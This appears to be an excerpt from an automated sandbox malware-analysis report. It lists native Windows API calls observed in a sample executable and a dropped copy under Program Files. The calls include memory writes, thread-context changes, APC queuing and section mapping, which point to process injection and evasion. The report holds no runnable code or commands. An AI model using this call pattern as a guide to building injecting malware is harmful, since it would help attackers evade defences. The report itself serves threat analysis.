Source: C:\Users\user\subfolder1\filename1.exe | Code function: 5_2_1F41A3E0 NtFreeVirtualMemory,LdrInitializeThunk,5_2_1F41A3E0
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 5_2_1F41A240 NtReadFile,LdrInitializeThunk,5_2_1F41A240
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 5_2_1F41A2D0 NtClose,LdrInitializeThunk,5_2_1F41A2D0
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 5_2_1F41A710 NtQuerySection,5_2_1F41A710
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 5_2_1F41A780 NtOpenDirectoryObject,5_2_1F41A780
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 5_2_1F41A650 NtQueueApcThread,5_2_1F41A650
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 5_2_1F41A6D0 NtCreateProcessEx,5_2_1F41A6D0
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 5_2_1F41BD40 NtSuspendThread,5_2_1F41BD40
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 5_2_1F41A520 NtEnumerateKey,5_2_1F41A520
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 5_2_1F41A5A0 NtWriteVirtualMemory,5_2_1F41A5A0
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 5_2_1F41A460 NtOpenProcess,5_2_1F41A460
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 5_2_1F41B470 NtOpenThread,5_2_1F41B470
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 5_2_1F41A470 NtSetInformationFile,5_2_1F41A470
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 5_2_1F41B410 NtOpenProcessToken,5_2_1F41B410
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 5_2_1F41A430 NtQueryVirtualMemory,5_2_1F41A430
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 5_2_1F41ACE0 NtCreateMutant,5_2_1F41ACE0
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 5_2_1F41A350 NtQueryValueKey,5_2_1F41A350
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 5_2_1F41A370 NtQueryInformationProcess,5_2_1F41A370
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 5_2_1F41A310 NtEnumerateValueKey,5_2_1F41A310
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 5_2_1F41A3D0 NtCreateKey,5_2_1F41A3D0
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 5_2_1F41A260 NtWriteFile,5_2_1F41A260
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 5_2_1F41A220 NtWaitForSingleObject,5_2_1F41A220
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 5_2_1F41BA30 NtSetContextThread,5_2_1F41BA30
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 5_2_1F41A2F0 NtQueryInformationFile,5_2_1F41A2F0
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 5_2_1F41A800 NtSetValueKey,5_2_1F41A800
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 5_2_1F41B0B0 NtGetContextThread,5_2_1F41B0B0
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 5_2_004F01AB EnumWindows,NtSetInformationThread,5_2_004F01AB
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 5_2_004F5A06 NtProtectVirtualMemory,5_2_004F5A06
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 5_2_004F5DAD NtSetInformationThread,5_2_004F5DAD
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 5_2_004F603D NtSetInformationThread,5_2_004F603D
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 5_2_004F60F0 NtSetInformationThread,5_2_004F60F0
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 5_2_004F6265 NtSetInformationThread,5_2_004F6265
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 5_2_004F02BC NtSetInformationThread,5_2_004F02BC
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 5_2_004F6376 NtSetInformationThread,5_2_004F6376
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 5_2_004F5DB6 NtSetInformationThread,5_2_004F5DB6
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 5_2_004F5E4B NtSetInformationThread,5_2_004F5E4B
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 5_2_004F5EF5 NtSetInformationThread,5_2_004F5EF5
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 5_2_004F5F8E NtSetInformationThread,5_2_004F5F8E
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 8_2_020A5A06 NtProtectVirtualMemory,8_2_020A5A06
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 8_2_020A1F11 NtWriteVirtualMemory,8_2_020A1F11
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 8_2_020A01AB EnumWindows,NtSetInformationThread,TerminateProcess,8_2_020A01AB
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 8_2_020A5DAD NtResumeThread,8_2_020A5DAD
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 8_2_020A2206 NtWriteVirtualMemory,8_2_020A2206
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 8_2_020A603D NtResumeThread,8_2_020A603D
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 8_2_020A5E4B NtResumeThread,8_2_020A5E4B
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 8_2_020A6265 NtResumeThread,8_2_020A6265
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 8_2_020A02BC NtSetInformationThread,TerminateProcess,8_2_020A02BC
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 8_2_020A20B3 NtWriteVirtualMemory,8_2_020A20B3
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 8_2_020A60F0 NtResumeThread,8_2_020A60F0
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 8_2_020A5EF5 NtResumeThread,8_2_020A5EF5
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 8_2_020A2360 NtWriteVirtualMemory,8_2_020A2360
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 8_2_020A6376 NtResumeThread,8_2_020A6376
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 8_2_020A5F8E NtResumeThread,8_2_020A5F8E
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 8_2_020A1FA9 NtWriteVirtualMemory,8_2_020A1FA9
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 8_2_020A5DB6 NtResumeThread,8_2_020A5DB6
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 10_2_1F40A750 NtCreateFile,LdrInitializeThunk,10_2_1F40A750
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 10_2_1F40A700 NtProtectVirtualMemory,LdrInitializeThunk,10_2_1F40A700
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 10_2_1F40A720 NtResumeThread,LdrInitializeThunk,10_2_1F40A720
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 10_2_1F40A610 NtAdjustPrivilegesToken,LdrInitializeThunk,10_2_1F40A610
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 10_2_1F40A6A0 NtCreateSection,LdrInitializeThunk,10_2_1F40A6A0
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 10_2_1F40A540 NtDelayExecution,LdrInitializeThunk,10_2_1F40A540
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 10_2_1F40A560 NtQuerySystemInformation,LdrInitializeThunk,10_2_1F40A560
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 10_2_1F40A5F0 NtReadVirtualMemory,LdrInitializeThunk,10_2_1F40A5F0
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 10_2_1F40A410 NtQueryInformationToken,LdrInitializeThunk,10_2_1F40A410
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 10_2_1F40A480 NtMapViewOfSection,LdrInitializeThunk,10_2_1F40A480
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 10_2_1F40A4A0 NtUnmapViewOfSection,LdrInitializeThunk,10_2_1F40A4A0
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 10_2_1F40A360 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_1F40A360
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 10_2_1F40A3E0 NtFreeVirtualMemory,LdrInitializeThunk,10_2_1F40A3E0
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 10_2_1F40A240 NtReadFile,LdrInitializeThunk,10_2_1F40A240
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 10_2_1F40A2D0 NtClose,LdrInitializeThunk,10_2_1F40A2D0
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 10_2_1F40A710 NtQuerySection,10_2_1F40A710
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 10_2_1F40A780 NtOpenDirectoryObject,10_2_1F40A780
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 10_2_1F40A650 NtQueueApcThread,10_2_1F40A650
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 10_2_1F40A6D0 NtCreateProcessEx,10_2_1F40A6D0
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 10_2_1F40BD40 NtSuspendThread,10_2_1F40BD40
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 10_2_1F40A520 NtEnumerateKey,10_2_1F40A520
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 10_2_1F40A5A0 NtWriteVirtualMemory,10_2_1F40A5A0
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 10_2_1F40A460 NtOpenProcess,10_2_1F40A460
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 10_2_1F40A470 NtSetInformationFile,10_2_1F40A470
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 10_2_1F40B470 NtOpenThread,10_2_1F40B470
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 10_2_1F40B410 NtOpenProcessToken,10_2_1F40B410
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 10_2_1F40A430 NtQueryVirtualMemory,10_2_1F40A430
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 10_2_1F40ACE0 NtCreateMutant,10_2_1F40ACE0
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 10_2_1F40A350 NtQueryValueKey,10_2_1F40A350
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 10_2_1F40A370 NtQueryInformationProcess,10_2_1F40A370
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 10_2_1F40A310 NtEnumerateValueKey,10_2_1F40A310
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 10_2_1F40A3D0 NtCreateKey,10_2_1F40A3D0
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 10_2_1F40A260 NtWriteFile,10_2_1F40A260
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 10_2_1F40A220 NtWaitForSingleObject,10_2_1F40A220
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 10_2_1F40BA30 NtSetContextThread,10_2_1F40BA30
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 10_2_1F40A2F0 NtQueryInformationFile,10_2_1F40A2F0
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 10_2_1F40A800 NtSetValueKey,10_2_1F40A800
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 10_2_1F40B0B0 NtGetContextThread,10_2_1F40B0B0
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 10_2_004F01AB EnumWindows,NtSetInformationThread,10_2_004F01AB
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 10_2_004F5A06 NtProtectVirtualMemory,10_2_004F5A06
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 10_2_004F5DAD NtSetInformationThread,10_2_004F5DAD
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 10_2_004F603D NtSetInformationThread,10_2_004F603D
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 10_2_004F60F0 NtSetInformationThread,10_2_004F60F0
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 10_2_004F6265 NtSetInformationThread,10_2_004F6265
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 10_2_004F02BC NtSetInformationThread,10_2_004F02BC
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 10_2_004F6376 NtSetInformationThread,10_2_004F6376
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 10_2_004F5DB6 NtSetInformationThread,10_2_004F5DB6
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 10_2_004F5E4B NtSetInformationThread,10_2_004F5E4B
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 10_2_004F5EF5 NtSetInformationThread,10_2_004F5EF5
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 10_2_004F5F8E NtSetInformationThread,10_2_004F5F8E
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 12_2_1F54A750 NtCreateFile,LdrInitializeThunk,12_2_1F54A750
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 12_2_1F54A700 NtProtectVirtualMemory,LdrInitializeThunk,12_2_1F54A700
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 12_2_1F54A720 NtResumeThread,LdrInitializeThunk,12_2_1F54A720
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 12_2_1F54A610 NtAdjustPrivilegesToken,LdrInitializeThunk,12_2_1F54A610
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 12_2_1F54A6A0 NtCreateSection,LdrInitializeThunk,12_2_1F54A6A0
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 12_2_1F54A540 NtDelayExecution,LdrInitializeThunk,12_2_1F54A540
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 12_2_1F54A560 NtQuerySystemInformation,LdrInitializeThunk,12_2_1F54A560
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 12_2_1F54A5F0 NtReadVirtualMemory,LdrInitializeThunk,12_2_1F54A5F0
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 12_2_1F54A410 NtQueryInformationToken,LdrInitializeThunk,12_2_1F54A410
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 12_2_1F54A480 NtMapViewOfSection,LdrInitializeThunk,12_2_1F54A480
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 12_2_1F54A4A0 NtUnmapViewOfSection,LdrInitializeThunk,12_2_1F54A4A0
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 12_2_1F54A360 NtAllocateVirtualMemory,LdrInitializeThunk,12_2_1F54A360
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 12_2_1F54A3E0 NtFreeVirtualMemory,LdrInitializeThunk,12_2_1F54A3E0
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 12_2_1F54A240 NtReadFile,LdrInitializeThunk,12_2_1F54A240
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 12_2_1F54A2D0 NtClose,LdrInitializeThunk,12_2_1F54A2D0
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 12_2_1F54BD40 NtSuspendThread,12_2_1F54BD40
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 12_2_1F54ACE0 NtCreateMutant,12_2_1F54ACE0
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 12_2_1F54BA30 NtSetContextThread,12_2_1F54BA30
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 12_2_1F54A800 NtSetValueKey,12_2_1F54A800
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 12_2_1F54A710 NtQuerySection,12_2_1F54A710
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 12_2_1F54A780 NtOpenDirectoryObject,12_2_1F54A780
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54A650 NtQueueApcThread,12_2_1F54A650
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54A6D0 NtCreateProcessEx,12_2_1F54A6D0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54A520 NtEnumerateKey,12_2_1F54A520
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54A5A0 NtWriteVirtualMemory,12_2_1F54A5A0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54A470 NtSetInformationFile,12_2_1F54A470
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54B470 NtOpenThread,12_2_1F54B470
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54A460 NtOpenProcess,12_2_1F54A460
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54B410 NtOpenProcessToken,12_2_1F54B410
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54A430 NtQueryVirtualMemory,12_2_1F54A430
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54A350 NtQueryValueKey,12_2_1F54A350
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54A370 NtQueryInformationProcess,12_2_1F54A370
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54A310 NtEnumerateValueKey,12_2_1F54A310
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54A3D0 NtCreateKey,12_2_1F54A3D0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54A260 NtWriteFile,12_2_1F54A260
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54A220 NtWaitForSingleObject,12_2_1F54A220
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54A2F0 NtQueryInformationFile,12_2_1F54A2F0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54B0B0 NtGetContextThread,12_2_1F54B0B0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_004F01AB EnumWindows,NtSetInformationThread,12_2_004F01AB
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_004F5A06 NtProtectVirtualMemory,12_2_004F5A06
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_004F5DAD NtSetInformationThread,12_2_004F5DAD
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_004F603D NtSetInformationThread,12_2_004F603D
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_004F60F0 NtSetInformationThread,12_2_004F60F0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_004F6265 NtSetInformationThread,12_2_004F6265
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_004F02BC NtSetInformationThread,12_2_004F02BC
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_004F6376 NtSetInformationThread,12_2_004F6376
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_004F5DB6 NtSetInformationThread,12_2_004F5DB6
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_004F5E4B NtSetInformationThread,12_2_004F5E4B
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_004F5EF5 NtSetInformationThread,12_2_004F5EF5
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_004F5F8E NtSetInformationThread,12_2_004F5F8E
Source: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exeCode function: 23_2_021B5A06 NtProtectVirtualMemory,23_2_021B5A06
Source: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exeCode function: 23_2_021B1F11 NtWriteVirtualMemory,23_2_021B1F11
Source: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exeCode function: 23_2_021B01AB EnumWindows,NtSetInformationThread,TerminateProcess,23_2_021B01AB
Source: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exeCode function: 23_2_021B5DAD NtResumeThread,23_2_021B5DAD
Source: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exeCode function: 23_2_021B2206 NtWriteVirtualMemory,23_2_021B2206
Source: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exeCode function: 23_2_021B603D NtResumeThread,23_2_021B603D
Source: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exeCode function: 23_2_021B5E4B NtResumeThread,23_2_021B5E4B
Source: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exeCode function: 23_2_021B6265 NtResumeThread,23_2_021B6265
Source: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exeCode function: 23_2_021B02BC NtSetInformationThread,TerminateProcess,23_2_021B02BC
Source: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exeCode function: 23_2_021B20B3 NtWriteVirtualMemory,23_2_021B20B3
Source: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exeCode function: 23_2_021B60F0 NtResumeThread,23_2_021B60F0
Source: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exeCode function: 23_2_021B5EF5 NtResumeThread,23_2_021B5EF5
Source: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exeCode function: 23_2_021B6376 NtResumeThread,23_2_021B6376
Source: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exeCode function: 23_2_021B2360 NtWriteVirtualMemory,23_2_021B2360
Source: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exeCode function: 23_2_021B5F8E NtResumeThread,23_2_021B5F8E
Source: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exeCode function: 23_2_021B5DB6 NtResumeThread,23_2_021B5DB6
Source: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exeCode function: 23_2_021B1FA9 NtWriteVirtualMemory,23_2_021B1FA9
Source: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exeCode function: 24_2_004F5A06 NtProtectVirtualMemory,24_2_004F5A06
Source: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exeCode function: 24_2_004F01AB EnumWindows,NtSetInformationThread,TerminateProcess,24_2_004F01AB
Source: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exeCode function: 24_2_004F02BC NtSetInformationThread,TerminateProcess,24_2_004F02BC
Source: C:\Users\user\subfolder1\filename1.exeCode function: 25_2_020F5A06 NtProtectVirtualMemory,25_2_020F5A06
Source: C:\Users\user\subfolder1\filename1.exeCode function: 25_2_020F1F11 NtWriteVirtualMemory,25_2_020F1F11
Source: C:\Users\user\subfolder1\filename1.exeCode function: 25_2_020F5DAD NtSetContextThread,25_2_020F5DAD
Source: C:\Users\user\subfolder1\filename1.exeCode function: 25_2_020F01AB EnumWindows,NtSetInformationThread,TerminateProcess,25_2_020F01AB
Source: C:\Users\user\subfolder1\filename1.exeCode function: 25_2_020F2206 NtWriteVirtualMemory,25_2_020F2206
Source: C:\Users\user\subfolder1\filename1.exeCode function: 25_2_020F603D NtSetContextThread,25_2_020F603D
Source: C:\Users\user\subfolder1\filename1.exeCode function: 25_2_020F5E4B NtSetContextThread,25_2_020F5E4B
Source: C:\Users\user\subfolder1\filename1.exeCode function: 25_2_020F6265 NtSetContextThread,25_2_020F6265
Source: C:\Users\user\subfolder1\filename1.exeCode function: 25_2_020F02BC NtSetInformationThread,TerminateProcess,25_2_020F02BC
Source: C:\Users\user\subfolder1\filename1.exeCode function: 25_2_020F20B3 NtWriteVirtualMemory,25_2_020F20B3
Source: C:\Users\user\subfolder1\filename1.exeCode function: 25_2_020F5EF5 NtSetContextThread,25_2_020F5EF5
Source: C:\Users\user\subfolder1\filename1.exeCode function: 25_2_020F60F0 NtSetContextThread,25_2_020F60F0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 25_2_020F2360 NtWriteVirtualMemory,25_2_020F2360
Source: C:\Users\user\subfolder1\filename1.exeCode function: 25_2_020F6376 NtSetContextThread,25_2_020F6376
Source: C:\Users\user\subfolder1\filename1.exeCode function: 25_2_020F5F8E NtSetContextThread,25_2_020F5F8E
Source: C:\Users\user\subfolder1\filename1.exeCode function: 25_2_020F1FA9 NtWriteVirtualMemory,25_2_020F1FA9
Source: C:\Users\user\subfolder1\filename1.exeCode function: 25_2_020F5DB6 NtSetContextThread,25_2_020F5DB6
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A750 NtCreateFile,LdrInitializeThunk,26_2_1F55A750
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A700 NtProtectVirtualMemory,LdrInitializeThunk,26_2_1F55A700
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A720 NtResumeThread,LdrInitializeThunk,26_2_1F55A720
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A610 NtAdjustPrivilegesToken,LdrInitializeThunk,26_2_1F55A610
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A6A0 NtCreateSection,LdrInitializeThunk,26_2_1F55A6A0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A540 NtDelayExecution,LdrInitializeThunk,26_2_1F55A540
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A560 NtQuerySystemInformation,LdrInitializeThunk,26_2_1F55A560
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A5F0 NtReadVirtualMemory,LdrInitializeThunk,26_2_1F55A5F0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A410 NtQueryInformationToken,LdrInitializeThunk,26_2_1F55A410
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A480 NtMapViewOfSection,LdrInitializeThunk,26_2_1F55A480
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A4A0 NtUnmapViewOfSection,LdrInitializeThunk,26_2_1F55A4A0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A360 NtAllocateVirtualMemory,LdrInitializeThunk,26_2_1F55A360
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A3E0 NtFreeVirtualMemory,LdrInitializeThunk,26_2_1F55A3E0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A240 NtReadFile,LdrInitializeThunk,26_2_1F55A240
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A2D0 NtClose,LdrInitializeThunk,26_2_1F55A2D0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55BD40 NtSuspendThread,26_2_1F55BD40
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55BA30 NtSetContextThread,26_2_1F55BA30
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55B470 NtOpenThread,26_2_1F55B470
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55B410 NtOpenProcessToken,26_2_1F55B410
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55B0B0 NtGetContextThread,26_2_1F55B0B0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55ACE0 NtCreateMutant,26_2_1F55ACE0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A800 NtSetValueKey,26_2_1F55A800
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A710 NtQuerySection,26_2_1F55A710
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A780 NtOpenDirectoryObject,26_2_1F55A780
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A650 NtQueueApcThread,26_2_1F55A650
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A6D0 NtCreateProcessEx,26_2_1F55A6D0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A520 NtEnumerateKey,26_2_1F55A520
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A5A0 NtWriteVirtualMemory,26_2_1F55A5A0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A470 NtSetInformationFile,26_2_1F55A470
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A460 NtOpenProcess,26_2_1F55A460
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A430 NtQueryVirtualMemory,26_2_1F55A430
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A350 NtQueryValueKey,26_2_1F55A350
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A370 NtQueryInformationProcess,26_2_1F55A370
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A310 NtEnumerateValueKey,26_2_1F55A310
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A3D0 NtCreateKey,26_2_1F55A3D0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A260 NtWriteFile,26_2_1F55A260
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A220 NtWaitForSingleObject,26_2_1F55A220
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A2F0 NtQueryInformationFile,26_2_1F55A2F0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_004F01AB NtSetInformationThread,26_2_004F01AB
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_004F5A06 NtProtectVirtualMemory,26_2_004F5A06
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_004F5DAD NtSetInformationThread,26_2_004F5DAD
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_004F603D NtSetInformationThread,26_2_004F603D
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_004F60F0 NtSetInformationThread,26_2_004F60F0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_004F6265 NtSetInformationThread,26_2_004F6265
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_004F02BC NtSetInformationThread,26_2_004F02BC
